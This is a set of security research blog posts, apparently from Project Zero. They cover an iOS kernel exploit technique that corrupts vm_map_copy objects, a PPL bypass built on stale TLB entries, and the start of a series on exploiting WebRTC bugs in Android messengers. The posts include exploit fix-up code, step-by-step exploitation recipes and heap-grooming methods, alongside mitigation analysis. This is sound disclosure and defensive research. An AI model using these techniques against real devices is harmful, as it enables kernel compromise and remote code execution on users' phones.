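Putting the fix-ups together, here is a hedged sketch using the kernel read/write primitive built above. The spinning thread's kernel stack bounds, the kernel addresses of the corrupted and replacement vm_map_copy objects, the overlay entry, and the "done" entry are all assumed to have been located already; the earlier entry-list fix-ups are not shown; and the field offsets follow the struct layouts discussed above.

#include <stdint.h>

extern uint64_t kread64(uint64_t kaddr);
extern void     kwrite64(uint64_t kaddr, uint64_t value);

#define OFF_VME_NEXT   0x08   /* vm_map_entry.links.next (assumed layout) */
#define OFF_COPY_LINKS 0x18   /* vm_map_copy.c_u.hdr.links */

static void release_copyout_thread(uint64_t stack_base, uint64_t stack_size,
                                   uint64_t corrupted_copy, uint64_t legit_copy,
                                   uint64_t overlay_entry, uint64_t done_entry) {
    /* 1. Swap the spilled vm_map_copy pointer on the spinning thread's kernel stack
     *    so that the zfree() after the loop frees a real vm_map_copy_zone element. */
    for (uint64_t addr = stack_base; addr < stack_base + stack_size; addr += 8) {
        if (kread64(addr) == corrupted_copy) {
            kwrite64(addr, legit_copy);
        }
    }
    /* 2. Point the overlay entry back at the corrupted copy's own links field, which
     *    is the for loop's termination condition. */
    kwrite64(overlay_entry + OFF_VME_NEXT, corrupted_copy + OFF_COPY_LINKS);
    /* 3. Release the spinning thread: "done" now links to the overlay entry, so the
     *    loop processes it, hits the exit condition, and returns. */
    kwrite64(done_entry + OFF_VME_NEXT, overlay_entry);
}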


At last, we have fixed up the state enough to allow vm_map_copyout_internal() to break the loop and return safely.

Homeward bound

Finally, with a virtual kernel read/write primitive and the vm_map_copyout_internal() thread safely returned, we have achieved our goal: a stable kernel compromise achieved by turning a one-byte controlled heap overflow directly into an arbitrary physical address mapping primitive.

Or rather, a nearly-arbitrary physical address mapping primitive. As we have seen, PPL-protected addresses like page table pages and DARTs cannot be mapped using this technique.

When I started on this journey, I had intended to demonstrate that the conventional approach of going after the kernel task port was both unnecessary and limiting, that other kernel read/write techniques could be equally powerful. I suspected that the introduction of Mach-port based techniques in iOS 10 had biased the sample of publicly-disclosed exploits in favor of Mach-port oriented vulnerabilities, and that this in turn obscured other techniques that were just as promising but publicly less well understood.

The one-byte technique initially seemed to offer a counterpoint to the mainstream exploit flow. After reading the code in vm_map.c and pmap.c, I had expected to be able to simply map all of DRAM into my address space and then implement kernel read/write by performing manual page table walks using those mappings. But it turned out that PPL blocks this technique on modern iOS by preventing certain pages from being mapped at all.

It's interesting to note that similar research was touched upon years ago as well, back when such a thing would have worked. While doing background research for this blog post, I came across a presentation by Azimuth called iOS 6 Kernel Security: A Hacker’s Guide that introduced no fewer than four separate primitives that could be constructed by corrupting various fields of vm_map_copy_t: an adjacent memory disclosure, an arbitrary memory disclosure, an extended heap overflow, and a combined address disclosure and heap overflow at the disclosed address.

A slide from an Azimuth presentation introducing the use of vm_map_copy_t in iOS kernel heap overflow attacks.


At the time of the presentation, the KERNEL_BUFFER type had a slightly different structure, so that c_u.hdr.links.next overlapped a field storing the vm_map_copy's kalloc() allocation size. It might have still been possible to turn a one-byte overflow into a physical memory mapping primitive on some platforms, but it would have been harder since it would require mapping the NULL page and a shared address space. However, a larger overflow like those used in the four aforementioned techniques could certainly change both the type and the c_u.hdr.links.next fields.

After its apparent public introduction in that Azimuth presentation by Mark Dowd and Tarjei Mandt, vm_map_copy corruption was repeatedly cited as a widely used exploit technique. See for example: From USR to SVC: Dissecting the 'evasi0n' Kernel Exploit by Tarjei Mandt; Tales from iOS 6 Exploitation by Stefan Esser; Attacking the XNU Kernel in El Capitan by Luca Todesco; Shooting the OS X El Capitan Kernel Like a Sniper by Liang Chen and Qidan He; iOS 10 - Kernel Heap Revisited by Stefan Esser; iOS kernel exploitation archaeology by Patroklos Argyroudis; and *OS Internals, Volume III: Security and Insecurity by Jonathan Levin, in particular Chapter 18 on TaiG. Given the prevalence of these other forms of vm_map_copy corruption, it would not surprise me to learn that someone had discovered the physical mapping primitive as well.

Then, in OS X 10.11 and iOS 9, the vm_map_copy struct was modified to remove the redundant allocation size and inline data pointer fields in KERNEL_BUFFER instances. It is possible that this was done to mitigate the frequent abuse of this structure in exploits, although it's hard to tell because those fields were redundant and could have been removed simply to clean up the code. Regardless, removing those fields changed vm_map_copy into its current form, weakening the precondition required to carry out this technique to a single byte overflow.

The mitigating of the Shire

So, how effective were the various iOS kernel exploit mitigations at blocking the one-byte technique, and how effective could they be if further hardened?

The mitigations I considered were KASLR, PAN, PAC, PPL, and zone_require. Many other mitigations exist, but either they don't apply to the heap overflow bug class or they aren't sensible candidates to mitigate this particular technique.

First, kernel address space layout randomization, or KASLR. KASLR can be divided into two parts: the sliding of the kernelcache image in virtual memory and the randomization of the kernel_map and submaps (zone_map, kalloc_map, etc.), collectively referred to as the "kernel heap". The kernel heap randomization means that you do need some way to determine the address of the kernel/user shared memory buffer in which we build the fake VM objects. However, once you have the address of the shared buffer, neither form of randomization has much bearing on this technique, for two reasons: First, generic iOS kernel heap shaping primitives exist that can be used to reliably place almost any allocation in the target kalloc zones before a vm_map_copy allocation, so randomization does not block the initial memory corruption. Second, after the corruption occurs, the primitive granted is arbitrary physical read/write, which is independent of virtual address randomization.

The only address randomization which does impact the core exploit technique is that of the kernelcache load address in physical memory. When iOS boots, iBoot loads the kernelcache into physical DRAM at a random address. As discussed in Part I, this physical randomization is quite small at 32 MB. However, improved randomization would not help because the AMCC hardware registers can be mapped to locate the kernelcache in physical memory regardless of where it is located.

Next consider PAN, or Privileged Access Never. This is an ARMv8.1 security mitigation that prevents the kernel from directly accessing userspace virtual memory, thereby preventing the common technique of overwriting pointers to kernel objects so that they point to fake objects living in userspace. Bypassing PAN is a prerequisite for this technique: we need to establish a complex hierarchy of vm_map_entry, vm_object, and vm_page objects at a known address. While hardcoding the shared buffer address is good enough for this POC, better techniques would be needed for a real exploit.

PAC, or Pointer Authentication Codes, is an ARMv8.3 security feature introduced in Apple's A12 SOC. The iOS kernel uses PAC for two purposes: first as an exploit mitigation against certain common bug classes and techniques, and second as a form of kernel control flow integrity to prevent an attacker with kernel read/write from gaining arbitrary code execution. In this setting, we're only interested in PAC as an exploit mitigation.

Apple's website has a table showing how various types of pointers are protected by PAC. Most of these pointers are automatically PAC-protected by the compiler, and the biggest impact of PAC so far is on C++ objects, especially in IOKit. Meanwhile, the one-byte exploit technique only involves vm_map_copy, vm_map_entry, vm_object, and vm_page objects, all plain C structs in the Mach part of the kernel, and so is unaffected by PAC.

However, at BlackHat 2019, Ivan Krstić of Apple announced that PAC would soon be used to protect certain "members of high value data structures", including "processes, tasks, codesigning, the virtual memory subsystem, [and] IPC structures". As of May 2020, this enhanced PAC protection has not yet been released, but if implemented it might prove effective at blocking the one-byte technique.

The next mitigation is PPL, which stands for Page Protection Layer. PPL creates a security boundary between the code that manages page tables and the rest of the XNU kernel. This is the only mitigation besides PAN that impacted the development of this exploit technique.

In practice, PPL could be much stricter about which physical addresses it allows to be mapped into a userspace process. For example, there is no legitimate use case for a userspace process to have access to kernelcache pages, so setting a flag like PVH_FLAG_LOCKDOWN on kernelcache pages could be a weak but sensible step. More generally, addresses outside the Application Processor's DRAM region (including physical I/O addresses for hardware components) could probably be made unmappable for most processes, perhaps with an entitlement escape hatch for exceptional cases.

Finally, the last mitigation is zone_require, a software mitigation introduced in iOS 13 that checks that some kernel pointers are allocated from the expected zalloc zone before using them. I don't believe that XNU's zone allocator was initially intended as a security mitigation, but the fact remains that many objects that are frequently targeted during exploits (in particular ipc_ports, tasks, and threads) are allocated from a dedicated zone. This makes zone checks an effective funnel point for detecting exploitation shenanigans.

In theory, zone_require could be used to protect almost any object allocated from a dedicated zone; in practice, though, the vast majority of zone_require() checks in the kernelcache are on ipc_port objects. Because the one-byte technique avoids the use of fake Mach ports altogether, none of the existing zone_require() checks apply.

However, if the use of zone_require were expanded, it is possible to partially mitigate the technique. In particular, inserting a zone_require() call in vm_map_copyout_internal() once the vm_map_copy has been determined to be of type ENTRY_LIST would ensure that the vm_map_copy cannot be a KERNEL_BUFFER object with a corrupted type. Of course, like all mitigations, this isn't 100% robust: using the technique in an exploit would probably still be possible, but it might require a better initial primitive than a one-byte overflow.
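
For illustration, such a check might look roughly like the following inside vm_map_copyout_internal(); the exact zone_require() signature has varied across XNU releases, so treat this as a sketch of where the check would go rather than a patch.

    if (copy->type == VM_MAP_COPY_ENTRY_LIST) {
        /* Panic unless this copy was really allocated from vm_map_copy_zone, i.e.
         * reject a kalloc()ed KERNEL_BUFFER object whose type byte was corrupted. */
        zone_require(copy, vm_map_copy_zone);
    }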

"Appendix A": Annals of the exploits

In my opinion, the one-byte exploit technique outlined in this blog post is a divergence from the conventional strategies employed at least since iOS 10. Fully 19 of the 24 original public exploits that I could find since iOS 10 used dangling or fake Mach ports as an intermediate exploitation primitive. And of the 20 exploits released since iOS 10.3 (when Apple initially started locking down the kernel task port), 18 of those ended by constructing a fake kernel task port. This makes Mach ports the defining feature of modern public iOS kernel exploitation.

Having gone through the motions of using the one-byte technique to build a kernel read/write primitive on top of a simulated heap overflow, I certainly can see the logic of going after the kernel task port instead. Most of the exploits I looked at since iOS 10 have a relatively modular design and a linear flow: an initial primitive is obtained, state is manipulated, an exploitation technique is applied to build a stronger primitive, state is manipulated again, another technique is applied after that, and so on, until finally you have enough to build a fake kernel task port. There are checkpoints along the way: initial corruption, dangling Mach port, 4-byte read primitive, etc. The exact sequence of steps in each case is different, but in broad strokes the designs of different exploits converge. And because of this convergence, the last steps of one exploit are pretty much interchangeable with those of any other. The design of it all "feels clean".

That modularity is not true of this one-byte technique. Once you start the vm_map_copyout_internal() loop, you are committed to this course until after you've obtained a kernel read/write primitive. And because vm_map_copyout_internal() holds the vm_map lock for the duration of the loop, you can't perform any of the virtual memory operations (like allocating virtual memory) that would normally be integral steps in a conventional exploit flow. Writing this exploit thus feels different, more messy.

All that said, and at the risk of sounding like I'm tooting my own horn, the one-byte technique intuitively feels to me somewhat more "technically elegant": it turns a weaker precondition directly into a very strong primitive while sidestepping most mitigations and avoiding most sources of instability and slowness seen in public iOS exploits. Of the 24 iOS exploits I looked at, 22 depend on reallocating a slot for an object that has been recently freed with another object, many doing so multiple times; with the notable exception of SockPuppet, this is an inherently risky operation because another thread could race to reallocate that slot instead. Furthermore, 11 of the 19 exploits since iOS 11 depend on forcing a zone garbage collection, an even riskier step that often takes a few seconds to complete.

Meanwhile, the one-byte technique has no inherent sources of instability or substantial time costs. It looks more like the type of technique I would expect sophisticated attackers would be interested in developing. And even if something goes wrong during the exploit and a bad address is dereferenced in the kernel, the fact that the vm_map lock is held means that the fault results in a deadlock rather than a kernel panic, making the failed exploit look like a frozen process instead of a system crash. (You can even "kill" the deadlocked app in the app switcher UI and then continue using the device afterwards.)

"Appendix B": Conclusions

I'll conclude by returning to the three questions posed at the very beginning of this post:

Is targeting the kernel task port really the best exploit flow? Or has the convergence on this strategy obscured other, perhaps more interesting, techniques? And are existing iOS kernel mitigations equally effective against other, previously unseen exploit flows?

These questions are all too "fuzzy" to have real answers, but I'll attempt to answer them anyway.

To the first question, I think the answer is no, the kernel task port is not the singular best exploit flow. In my opinion the one-byte technique is just as good by most measures, and in my personal opinion, I expect there are other as-yet unpublished techniques that are also equally good.

To the second question, on whether the convergence on the kernel task port has obscured other techniques: I don't think there is enough public iOS research to say conclusively, but my intuition is yes. In my own experience, knowing the type of bug I'm looking for has influenced the types of bugs I find, and looking at past exploits has guided my choice in exploit flow. I would not be surprised to learn others feel similarly.

Finally, are existing iOS kernel exploit mitigations effective against unseen exploit flows? Immediately after I developed the POC for the one-byte technique, I had thought the answer was no; but here at the end of this journey, I'm less certain. I don't think PPL was specifically designed to prevent this technique, but it offers a very reasonable place to mitigate it. PAC didn't do anything to block the technique, but it's plausible that a future expansion of PAC-protected pointers would. And despite the fact that zone_require didn't impact the exploit at all, a single-line addition would strengthen the required precondition from a single-byte overflow to a larger overflow that crosses a zone boundary. So, even though in their current form Apple's kernel exploit mitigations were not effective against this unseen technique, they do lay the necessary groundwork to make mitigating the technique straightforward.

Indices

One final parting thought. In Deja-XNU, published 2018, Ian Beer mused about what the "state-of-the-art" of iOS kernel exploitation might have looked like four years prior:

An idea I've wanted to play with for a while is to revisit old bugs and try to exploit them again, but using what I've learnt in the meantime about iOS. My hope is that it would give an insight into what the state-of-the-art of iOS exploitation could have looked like a few years ago, and might prove helpful if extrapolated forwards to think about what state-of-the-art exploitation might look like now.

This is an important question to consider because, as defenders, we almost never get to see the capabilities of the most sophisticated attackers. If a gap develops between the techniques used by attackers in private and the techniques known to defenders, then defenders may waste resources mitigating against the wrong techniques.

I don't think this technique represents the current state-of-the-art; I'd guess that, like Deja-XNU, it might represent the state-of-the-art of a few years ago. It's worth considering what direction the state-of-the-art may have taken in the meantime.

The core of Apple is PPL: Breaking the XNU kernel's kernel

31 July 2020 at 16:19
By: Tim
Posted by Brandon Azad, Project Zero

While doing research for the one-byte exploit technique, I considered several ways it might be possible to bypass Apple's Page Protection Layer (PPL) using just a physical address mapping primitive, that is, before obtaining kernel read/write or defeating PAC. Given that PPL is even more privileged than the rest of the XNU kernel, the idea of compromising PPL "before" XNU was appealing. In the end, though, I wasn't able to think of a way to break PPL using the physical mapping primitive alone.

PPL's goal is to prevent an attacker from modifying a process's executable code or page tables, even after obtaining kernel read/write/execute privileges. It does this by leveraging APRR to create something of a "kernel inside the kernel" that protects page tables. During normal kernel execution, page tables and page table metadata are read-only, and code that modifies page tables is non-executable; the only way for the kernel to modify page tables is to enter PPL by calling a "PPL routine", which is analogous to a syscall from XNU into PPL. This limits the entry points into the kernel code that can modify page tables to just those PPL routines.

I considered several ideas to bypass PPL using the one-byte technique's physical mapping primitive, including mapping page tables directly, mapping a DART to allow modifying physical memory from a coprocessor, and mapping the I/O addresses used to control clock gating to power down certain components of the system. Unfortunately, none of these ideas panned out.

However, it's not the Project Zero way to leave any mitigation unbroken. So, having exhausted my search for design flaws, I returned to the ever-faithful technique of memory corruption. Sure enough, decompiling a few PPL functions in IDA was sufficient to find some memory corruption.

Decompiler output showing the memory corruption in pmap_remove_options_internal(): using a kernel function calling primitive, both va_start and size are controlled in the call to pmap_remove_range_options().

The function pmap_remove_options_internal() is a PPL routine, one of the "PPL syscalls" from the XNU kernel to the even more privileged PPL. It is called by invoking pmap_remove_options() in XNU, which validates arguments and then calls pmap_remove_options_internal() in PPL. Its purpose is to unmap the supplied virtual address range from the physical memory map (pmap) of a process.

MARK_AS_PMAP_TEXT static int
pmap_remove_options_internal(
        pmap_t pmap,
        vm_map_address_t start,
        vm_map_address_t end,
        int options)

The actual work of removing the translation table entries (TTEs) that map the supplied virtual address range is done by calling pmap_remove_range_options(), which takes pointers to the beginning and end of the TTE range to remove from the level 3 (leaf) translation table.

static int
pmap_remove_range_options(
        pmap_t pmap,
        pt_entry_t *bpte,   // The first L3 TTE to remove
        pt_entry_t *epte,   // The end of the TTEs
        uint32_t *rmv_cnt,
        int options)

Unfortunately, when pmap_remove_options_internal() calls pmap_remove_range_options(), it seems to assume that the supplied virtual address range will not cross an L3 translation table boundary, because if it does then the calculated TTE range will span out-of-bounds memory:

remove_count = pmap_remove_range_options(
                   pmap,
                   &l3_table[(va_start >> 14) & 0x7FF],
                   (u64 *)((char *)&l3_table[(va_start >> 14) & 0x7FF]
                         + ((size >> 11) & 0x1FFFFFFFFFFFF8LL)),
                   &rmv_spte,
                   options);

This means that if we have an arbitrary kernel function calling primitive, we can invoke the PPL-entering wrapper function directly and get pmap_remove_options_internal() called with an improper virtual address range, which makes pmap_remove_range_options() try to remove "TTEs" read from out-of-bounds memory while in PPL mode. And since the removed TTEs are zeroed out, this means that we can corrupt PPL-protected memory.
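
To make the out-of-bounds range concrete, here is a small worked example of the pointer arithmetic above, assuming 16K pages (so the L3 index is (va_start >> 14) & 0x7FF and each of the 2048 entries is 8 bytes); the table address is made up and only the indices matter:

#include <stdint.h>
#include <stdio.h>

int main(void) {
    uint64_t l3_table = 0xffffffe000000000ULL; /* hypothetical L3 table, entries 0..2047 */
    uint64_t va_start = 0x1ff8000ULL;          /* L3 index (va_start >> 14) & 0x7FF = 2046 */
    uint64_t size     = 4 * 0x4000ULL;         /* 4 pages, spanning the table boundary */

    uint64_t bpte = l3_table + 8 * ((va_start >> 14) & 0x7FF);
    uint64_t epte = bpte + ((size >> 11) & 0x1FFFFFFFFFFFF8ULL);

    /* The last valid entry is index 2047, so entries 2048 and 2049 are
     * processed out of bounds. */
    printf("begin index = %llu\n", (unsigned long long)((bpte - l3_table) / 8)); /* 2046 */
    printf("end   index = %llu\n", (unsigned long long)((epte - l3_table) / 8)); /* 2050 */
    return 0;
}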

Calling pmap_remove_options_internal() with an address range spanning an L2 TTE boundary (that is, the address range requires two L2 TTEs to map it) will cause the processed TTE array to run off the end of the L3 translation table page, resulting in out-of-bounds TTEs being removed.


But zeroing out-of-bounds TTEs would be a rather annoying primitive to try and leverage for a PPL bypass. Much of the data we'd like to corrupt has probably already been allocated far away from our page tables, and PPL isn't a large enough code base that we're guaranteed to find something interesting we can do just by zeroing memory. And that's to say nothing of the accounting in PPL that would probably detect an attempt to unmap non-existent TTEs!

So instead I chose to focus on a side effect of this out-of-bounds processing: improper TLB invalidation.

Later on in pmap_remove_options_internal(), after the TTEs have been removed, the translation lookaside buffer (TLB) needs to be invalidated in order to ensure that the process cannot continue to access the unmapped pages through stale TLB entries.

    flush_mmu_tlb_region_asid_async(va_start, size, pmap);

This TLB flush occurs on the supplied virtual address range, not the removed TTEs. Thus, there could be a disagreement between the TLB entries invalidated and the L3 TTEs removed if the out-of-bounds TTEs were from a separate region of the process's address space, leaving stale TLB entries for those out-of-bounds TTEs.

By carefully controlling the layout of translation tables, it's possible to transform the out-of-bounds TTE removal into a different bug: improper TLB invalidation. This is because the out-of-bounds TTEs can correspond to discontiguous parts of the virtual address space, causing the set of TTEs removed to differ from the set of TLB entries flushed.


A stale TLB entry would allow a process to continue accessing the physical page after that page has been unmapped and potentially reused for page tables. So if we had a stale TLB entry for an L3 translation table, then we could insert L3 TTEs to map arbitrary PPL-protected pages as writable.

That's pretty much exactly how the PPL bypass works:

  1. Call the kernel function cpm_allocate() to allocate 2 pages of contiguous physical memory called A and B.
  2. Call pmap_mark_page_as_ppl_page() to insert pages A and B at the head of the ppl_page_list so they can be reused for page tables.
  3. Fault in pages for virtual addresses P and Q so that A and B are allocated as L3 TTs for mapping P and Q, respectively. P and Q are discontiguous but have TTEs that are contiguous.
  4. Start a spinner thread bound to a CPU core that reads from page Q in a loop to keep the TLB entry alive.
  5. Call pmap_remove_options() to remove 2 pages starting from virtual address P (which does not include Q). The vulnerability means that TTEs for both P and Q are removed, but only the TLB entry for P is invalidated.
  6. Call pmap_mark_page_as_ppl_page() to insert page Q at the head of the ppl_page_list so it can be reused for page tables.
  7. Fault in a page for virtual address R so that page Q is allocated as an L3 TT for R, even while we continue to have a stale TLB entry for Q.
  8. Using the stale TLB entry, write to page Q to insert an L3 TTE which maps Q itself as writable.

An animation showing the progression of the exploit over time. The vulnerability is used to establish a stale TLB entry for an unmapped page Q which then gets reallocated as an L3 translation table. The stale TLB entry for Q allows us to modify it and insert an L3 TTE mapping Q itself, which can then be used to modify page tables even after the stale TLB entry has been cleared.


This bypass was reported as Project Zero issue 2035 and fixed in iOS 13.6; you can find a POC that demonstrates how to map arbitrary physical addresses into EL0 there. Also, for a much more detailed look at exploiting improper TLB invalidation, check out Jann Horn's excellent blog post on the topic.

This bug demonstrates a common problem when creating a security boundary where none existed before. It's easy for code to make subtle assumptions about the security model (such as where argument validation occurs or what functionality is exposed vs. private) that no longer hold true under the new model. I wouldn't be surprised to see more bugs along this line in PPL.

Overall, though, I came away from this exercise impressed with the design of PPL. I think it's a sound mitigation with a clear security boundary that doesn't introduce more attack surface. My biggest criticism is that the value-add proposition of PPL is still not clear to me: What real-world attacks does PPL mitigate? Is it simply laying the groundwork for more sophisticated and powerful mitigations to come? Whatever the answer may be, I still prefer having it. Kudos to Apple for an interesting and well-thought-out mitigation.

Exploiting Android Messengers with WebRTC: Part 1

3 August 2020 at 17:40
By: Tim
Posted by Natalie Silvanovich, Project Zero

This is a three-part series on exploiting messenger applications using vulnerabilities in WebRTC. This series highlights what can go wrong when applications don't apply WebRTC patches and when the communication and notification of security issues breaks down. Part 2 is scheduled for August 5 and Part 3 is scheduled for August 6.

Part 1: First Attempts

WebRTC is an open source video conferencing solution used by a variety of software including browsers, messaging clients and streaming services. While Project Zero has reported several vulnerabilities in WebRTC in the past, it was not clear whether these bugs were exploitable, especially outside of browsers. I investigated whether two recent bugs are exploitable in popular Android messaging applications.

The Bugs


I started off by trying to exploit two bugs, CVE-2020-6389 and CVE-2020-6387.

Both of these vulnerabilities are in WebRTC’s Real-time Transport Protocol (RTP) processing. RTP is the protocol WebRTC uses to transport audio and video content from peer to peer. RTP supports extensions, which are extra pieces of data that can be included in each packet to tell the destination peer how to display or process the data. For example, there is an extension that contains information about the screen orientation of the sending device, and one that contains the volume level. Both of these vulnerabilities occurred in extensions that had been implemented in WebRTC in 2019.

CVE-2020-6389 occurred in the frame marking extension, which contains information on how video content is split into frames. The bug is in how it processes layer information: WebRTC only supports five layers, but the layer number is a three-bit field in the extension, which means it can go as high as seven. This leads to an out-of-bounds write in the following code. temporal_idx is set from the layer number in the extension. 

if (layer_info_it->second[temporal_idx] != -1 &&
    AheadOf<uint16_t>(layer_info_it->second[temporal_idx],
                      frame->id.picture_id)) {
  // Not a newer frame. No subsequent layer info needs update.
  break;
}
...
layer_info_it->second[temporal_idx] = frame->id.picture_id;

The final line of code is where the out-of-bounds write occurs, as the array only contains five elements. This bug also has some limitations that are not obvious from the above code. To start, there is a check before the write: whether the current value of the memory, cast to a 16-bit unsigned integer, is more than the current sequence number. The write only occurs if this is true. Practically, this wasn’t much of a limitation; a crash usually occurred after two or three attempts when I tested it. A more serious limitation is that the elements of layer_info_it->second are 64-bit integers, but frame->id.picture_id is a 16-bit integer. This means that while this bug allows an attacker to write up to three 64-bit integers outside of a fixed-size heap buffer, the values that can be written are very limited, and are too small to represent pointers.

CVE-2020-6387 is a bug in how the video timing extension is processed by Forward Error Correction (FEC). FEC copies incoming RTP packets, and then clears certain extensions when attempting to correct errors. This vulnerability occurs because extensions of the video timing type are not verified to be of the expected length before they are cleared. The code causing this bug is as follows:

case RTPExtensionType::kRtpExtensionVideoTiming: {
  // Nullify 3 last entries: packetization delay and 2 network timestamps.
  // Each of them is 2 bytes.
  uint8_t* p = WriteAt(extension.offset) + VideoSendTiming::kPacerExitDeltaOffset;
  memset(p, 0, 6);
  break;
}

The value of VideoSendTiming::kPacerExitDeltaOffset is 7, so this code writes six zeros from offset 7 to offset 13 from the start of the extension in the packet. However, there is no check that the extension data is more than 13 bytes long, or even that the packet has this number of bytes left. The result of this bug is that an attacker can write up to six zeros to the heap at an offset of up to seven bytes from a variable sized heap buffer. This bug is better than CVE-2020-6389 in some ways and worse in others. It is better in that the heap buffer that can be overflowed is variable size, which gives a lot more options of what can be overwritten by this bug on the heap. The offset also offers some flexibility on where the zeros are written, and the write does not have to be aligned, whereas CVE-2020-6389 requires 64-bit alignment. This bug is worse in that the value written has to be zero, and the size of the area that can be written is smaller (six bytes versus 24).
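
For comparison, here is a sketch of the kind of length validation that was missing; the identifiers mirror the snippet above, but this is illustrative rather than the actual upstream fix:

case RTPExtensionType::kRtpExtensionVideoTiming: {
  // Only clear the timing fields if the extension actually contains them.
  if (extension.length >= VideoSendTiming::kPacerExitDeltaOffset + 6) {
    uint8_t* p = WriteAt(extension.offset) + VideoSendTiming::kPacerExitDeltaOffset;
    memset(p, 0, 6);
  }
  break;
}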

Moving the Instruction Pointer


I started off by seeing if it was possible to use either of these bugs to move the instruction pointer. Modern Android uses jemalloc, a slab allocator which doesn’t use inline heap headers, so corrupting heap metadata was not an option. Instead, I compiled WebRTC for Android with symbols, and loaded it in IDA. I then went through the available object types to see if there was anything that could obviously be used to move the instruction pointer or improve the capabilities of the bug. I didn’t find anything.

I thought maybe I could use CVE-2020-6389 to overwrite a length and cause a larger overflow, but this had some problems. To start, the bug writes a 64-bit integer, whereas a lot of length fields are 32-bit integers, which means the write also overwrites something else, and it can only write a non-zero value if the length field is 64-bit aligned. The location of the bug in processing is also problematic, as the overwrite happens near the end of processing an incoming packet, meaning that many objects are not accessed again after this point, so any overwritten memory would never be used again. CVE-2020-6389 also overflows a heap buffer of fixed size 80, which limits the object types that can be affected by this bug. I didn’t think CVE-2020-6387 would be viable for this purpose either, as it can only write zeros, which can only make a length smaller.

I wasn’t sure where to go at this point, so I triggered CVE-2020-6389 a few dozen times on Android to see if there were any crashes at an address wider than 16 bits, hoping they might give me ideas of ways that this bug could influence the behavior of the code other than overwriting a pointer with an invalid 16-bit value. To my surprise, about one in 20 times it crashed with the instruction pointer set to a value that had clearly been read off the heap.

Analyzing the crash, it turned out that a StunMessage object was being allocated after the overflowed region. The members of the StunMessage class are as follows.

protected:
  std::vector<std::unique_ptr<StunAttribute>> attrs_;
 ...
 private:
  ...
  uint16_t type_;
  uint16_t length_;
  std::string transaction_id_;
  uint32_t reduced_transaction_id_;
  uint32_t stun_magic_cookie_;

So after the vtable, the first member is a vector. How are vectors laid out in memory? It turns out its first two members are as follows.

  pointer __begin_;
  pointer __end_;

These pointers point to the beginning and the end of the vector’s contents in memory. During the crash, the __end_ member was overwritten with a small 16-bit integer. Vector iteration works by starting at the __begin_ pointer and incrementing until the  __end_ pointer is reached, so this change means that the next time the vector is iterated over, usually in the destructor, it will go out of bounds. Since this vector contains virtual objects of type StunAttribute, it will perform a virtual call to each element, to call its destructor. This virtual call on out-of-bounds memory was what was moving the instruction pointer.

This seemed like a reasonable way to control the instruction pointer, except for one problem: in a typical configuration, it is not possible for an attacker at one end of a WebRTC connection to send STUN to the user at the other, instead they each communicate with their own STUN server. I asked Philipp Hancke of webrtchacks if he knew of a way. He suggested this method, which involves specifying a TCP server controlled by the attacker as a potential routable path between two peers, called an ICE candidate. Both the attacker and target device will then communicate through this server, including STUN messages.

This allowed me to send STUN messages with an unusually large number of attributes. This was necessary because in order to control the instruction pointer, I would need to be able to control what showed up in memory after the STUN attribute vector. jemalloc groups allocations into predefined size classes and places allocations of the same size class in contiguous memory runs. The less used a size class is, the more likely it is that two objects of the same size class will be allocated one after the other.

Typically, STUN messages have a small number of attributes, which translates to a vector buffer size of 32 or 64 bytes, which are both very frequently used size classes. Instead, I sent STUN messages with 128 attributes, which translated to a vector buffer size of 1024 bytes, which happens to be an infrequently used size class in WebRTC. By sending many STUN messages with this number of attributes, while at the same time sending RTP packets of size 1024 containing the desired pointer value, interspersed with packets containing the bug, I was able to get a virtual call on that pointer value about one in five times. This was good enough for use in an exploit, and I decided to move on to breaking ASLR.
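
The size class math behind the choice of 128 attributes is easy to verify; the snippet below only assumes that each attribute is held by an 8-byte std::unique_ptr in the vector's backing store:

#include <cstdio>
#include <memory>

struct StunAttribute;  // opaque here; only the size of its unique_ptr matters

int main() {
  constexpr size_t kAttributes = 128;
  // 128 * 8 = 1024 bytes, which lands in a relatively quiet jemalloc size class.
  printf("vector backing store: %zu bytes\n",
         kAttributes * sizeof(std::unique_ptr<StunAttribute>));
  return 0;
}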

Breaking ASLR


There were two possible approaches for breaking ASLR in this exploit. One was to use one of the above bugs to read memory and send it back to the attacker device or TCP server somehow, the other was to use some sort of crash oracle to determine the memory layout.

I started off by seeing whether it was possible to use one of the bugs to read memory remotely from the target device. Mark Brand suggested that it might be possible to use CVE-2020-6387 to accomplish this by setting the low bytes of a pointer to outgoing data to zero, causing out-of-bounds data to be sent instead of the actual data. This seemed like a promising approach, so I used IDA to look for potential objects.

It turned out there were quite a few, and they all had problems. I spent some time on SendPacketMessageData and DataReceivedMessageData. These objects are used to store pointers to outgoing RTP data while it is queued. They contain a CopyOnWriteBuffer object, and its first member is a ref-counted pointer to an rtc::Buffer object. It was possible to set the bottom bytes of this pointer to be zero using CVE-2020-6387. Unfortunately, the structure of rtc::Buffer made revealing memory this way challenging.

RefCountedObject vtable;
size_t size_;
size_t capacity_;
std::unique_ptr<T[]> data_;

I was hoping that it would be possible to make the clipped pointer to this structure point to some other object on the heap that had a pointer at the location of the data_ member, so that data would get sent instead. However, it turned out that in the process of sending data, all four members of the object above get accessed and need to be reasonably valid. I went through all the available objects in the same size class as the rtc::Buffer class, but couldn’t find one with these exact properties.

I then considered that instead of using a different object, I could use an rtc::Buffer object that had already been freed, with a specific backing buffer size that could be replaced with an object containing pointers using heap manipulation. This didn’t work out either. This was largely an issue of reliability. To start off, an rtc::Buffer object is 36 bytes, which translates to size class 48 in jemalloc, meaning 48 bytes get allocated. Imagining some contiguous allocations of this type, the addresses would be as follows.

0x[...]0000      buffer 0
0x[...]0030      buffer 1
0x[...]0060      buffer 2
0x[...]0090      buffer 3
0x[...]00c0      buffer 4
0x[...]00f0       buffer 5
0x[...]0120      buffer 6
...
   
If the low byte of the address of any of buffers 0 through 5 is set to zero by the vulnerability, the clipped pointer still lands on a valid buffer, but if the same is done to buffer 6, it does not, because 0x100 is not a multiple of 48. The end result is that every time the bug hits the SendPacketMessageData object, there is only a one in three chance it will end up pointing to a valid rtc::Buffer. Hitting the object in the first place is also unreliable, because there are many other allocations of a similar size being made by WebRTC. It’s possible to increase the number of these objects on the heap, and the amount of time before they are sent, by using the TCP server to make the connection very slow, but even then I could only hit the structure less than 10% of the time. Having to manipulate the heap so that there are many freed rtc::Buffer objects in a row in the first place, with their backing buffers replaced by something containing pointers, added even more unreliability. I eventually abandoned this approach because I didn’t think I could get it reliable enough to use in an exploit with a reasonable amount of effort, though I think it’s probably possible. The crash behavior of the application being attacked also matters a lot. This would probably work on an application that respawns immediately in the case of a crash, but would be a lot less practical on an application that stops respawning unless there is a certain delay, which is common on Android.
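
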